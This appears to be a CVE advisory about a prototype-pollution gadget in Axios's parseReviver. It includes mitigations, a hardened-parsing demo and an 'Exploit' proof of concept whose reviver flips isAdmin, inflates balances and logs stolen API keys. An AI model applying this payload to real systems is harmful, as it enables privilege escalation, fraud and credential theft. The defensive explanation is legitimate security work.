How the CVE works (technical details)
The vulnerability resides in Axios's default `transformResponse` function (line 124 of lib/defaults/index.js). This function calls JSON.parse(data, this.parseReviver), where `this` is the merged config object. Because `parseReviver` is not defined in the Axios defaults, is not validated by assertOptions, and is not protected against prototype chain traversal, an attacker who can pollute `Object.prototype.parseReviver` (through any dependency such as qs, lodash, etc.) can inject a malicious reviver function. That reviver executes for every key–value pair in every JSON response Axios processes. The attacker can read the original values (exfiltrating API keys, tokens, PII) and surgically modify specific fields (e.g., isAdmin: false → true) while leaving the rest of the response intact. No constraints apply: the reviver may return any value, and the attack works silently inside the default transform, bypassing all existing prototype pollution mitigations (including those for the `transformResponse` and `proxy` gadgets). All Axios versions from v0.x through v1.15.0 are affected.
dailycve form
Platform: Axios library
Version: All versions
Vulnerability: Prototype pollution gadget
Severity: Critical (9.1)
Date: 2026-04-16
Prediction: Around May 2026
What Undercode Says:
Check if your Axios version is vulnerable:
npm list axios
Simulate prototype pollution in Node.js:
node -e "Object.prototype.parseReviver = (k,v) => k==='isAdmin'?true:v;"
Test with the vulnerable Axios PoC (server + client):
curl -X GET http://localhost:3000/api/me
Mitigation: apply the patch using hasOwnProperty:
sed -i 's/JSON.parse(data, this.parseReviver)/const r = Object.prototype.hasOwnProperty.call(this, "parseReviver") ? this.parseReviver : undefined; JSON.parse(data, r)/' node_modules/axios/lib/defaults/index.js
Exploit:
// Attacker pollutes Object.prototype once
Object.prototype.parseReviver = function(key, value) {
if (key === 'isAdmin') return true; // privilege escalation
if (key === 'balance') return 999999; // financial fraud
if (key === 'apiKey') { // exfiltration
console.log('Stolen:', value);
return value; // keep response normal
}
return value;
};
// After pollution, every Axios JSON response is silently tampered
const axios = require('axios');
(async () => {
  const response = await axios.get('/api/user'); // isAdmin becomes true
})();
Protection from this CVE
- hasOwnProperty check – Use `Object.prototype.hasOwnProperty.call(this, 'parseReviver')` before passing the reviver to JSON.parse.
- Null-prototype config – In mergeConfig.js, create the merged config with `Object.create(null)` to block prototype traversal.
- Validate reviver – Ensure `this.parseReviver` is a function and an own property.
- Temporary workaround – Freeze `Object.prototype`: `Object.freeze(Object.prototype)`.
- Update when patch released – Await the official Axios fix (expected May 2026).
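As an added example (not Axios's code and not part of the original advisory), the vulnerable read of `config.parseReviver` sits beside the hardened own-property-plus-function check from the list above; both run against a constructed API response while `Object.prototype` is temporarily polluted the way the advisory describes, and the runtime is restored afterwards. The function names (`vulnerableParse`, `hardenedParse`, `prototypeLooksPolluted`, `demo`) are hypothetical.

```javascript
'use strict';

// Mirrors the vulnerable pattern: the reviver is read off a plain config object,
// so an inherited Object.prototype.parseReviver is picked up silently.
function vulnerableParse(data, config) {
  return JSON.parse(data, config.parseReviver);
}

// Hardened: the reviver must be an own property of the config AND a function.
function resolveReviver(config) {
  const own = Object.prototype.hasOwnProperty.call(config, 'parseReviver')
    ? config.parseReviver
    : undefined;
  return typeof own === 'function' ? own : undefined;
}

function hardenedParse(data, config) {
  return JSON.parse(data, resolveReviver(config));
}

// Defensive runtime check: has Object.prototype gained a parseReviver gadget?
function prototypeLooksPolluted() {
  return Object.prototype.hasOwnProperty.call(Object.prototype, 'parseReviver');
}

// Runs both parsers against a constructed response while Object.prototype is
// polluted (simulating the advisory's gadget), then restores the prototype.
function demo() {
  const body = '{"user":"alice","isAdmin":false,"balance":100}'; // constructed sample
  const config = {}; // plain object, like a merged Axios config
  const before = prototypeLooksPolluted();
  Object.prototype.parseReviver = (k, v) => (k === 'isAdmin' ? true : v); // simulated pollution
  try {
    return {
      pollutedBefore: before,
      pollutedDuring: prototypeLooksPolluted(),
      vulnerable: vulnerableParse(body, config), // isAdmin flips to true
      hardened: hardenedParse(body, config),     // response left untouched
      // a reviver the caller explicitly configured still works with the hardened parser
      ownReviver: hardenedParse(body, { parseReviver: (k, v) => (k === 'balance' ? v * 2 : v) }),
    };
  } finally {
    delete Object.prototype.parseReviver; // restore the runtime
  }
}
```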
Impact
- Authorization bypass – Viewer becomes admin, `isAdmin: false` → true.
- Financial manipulation – Balance changed from 100 to 999999, transactions approved.
- Silent data exfiltration – API keys, tokens, and PII stolen from every JSON response without errors.
- Universal & invisible – Affects all JSON responses; no crash, no log anomaly, response structure intact.
Sources:
Reported By: github.com